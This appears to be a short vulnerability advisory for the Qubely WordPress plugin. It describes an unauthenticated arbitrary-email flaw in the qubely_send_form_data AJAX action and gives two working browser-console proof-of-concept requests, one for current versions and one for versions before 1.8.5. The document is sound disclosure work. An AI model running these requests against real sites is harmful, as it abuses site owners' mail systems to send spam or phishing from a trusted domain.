Description The plugin allows unauthenticated user to send arbitrary e-mails to arbitrary addresses via the qubely_send_form_data AJAX action.
Execute the below command in the web developer console, on the blog homepage as an unauthenticated user, replacing domain by the domain of the blog:
Current PoC:
jQuery.post('/wp-admin/admin-ajax.php?action=qubely_send_form_data', { 'email-receiver': '[email protected]', 'email-subject': 'Unauthorised Email', 'email-from': 'xx:sender@DOMAIN', 'email-body':'Yolo', 'security': qubely_urls['nonce'] })
Pre-1.8.5 PoC:
jQuery.post('/wp-admin/admin-ajax.php?action=qubely_send_form_data', { 'email-receiver': btoa('[email protected]'), 'email-subject': btoa('Unauthorised Email'), 'email-from': btoa('xx:sender@DOMAIN'), 'email-body': btoa('Yolo') });